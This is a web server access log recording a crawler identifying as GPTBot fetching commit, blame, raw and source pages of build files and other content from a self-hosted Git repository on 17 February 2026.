git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fdata_fetcher%2f__pycache__%2finvesting_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 20834] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/investing_fetcher.cpython-312.pyc" +[17/Feb/2026:17:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/calculator.cpython-312.pyc" +[17/Feb/2026:17:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33676] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33679] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33679] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43113] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21750] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10811] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10809] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21750] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg?display=source" [Client 74.7.227.38] [Length 14218] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:17:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:45:37 +0000] - 200 200 - GET 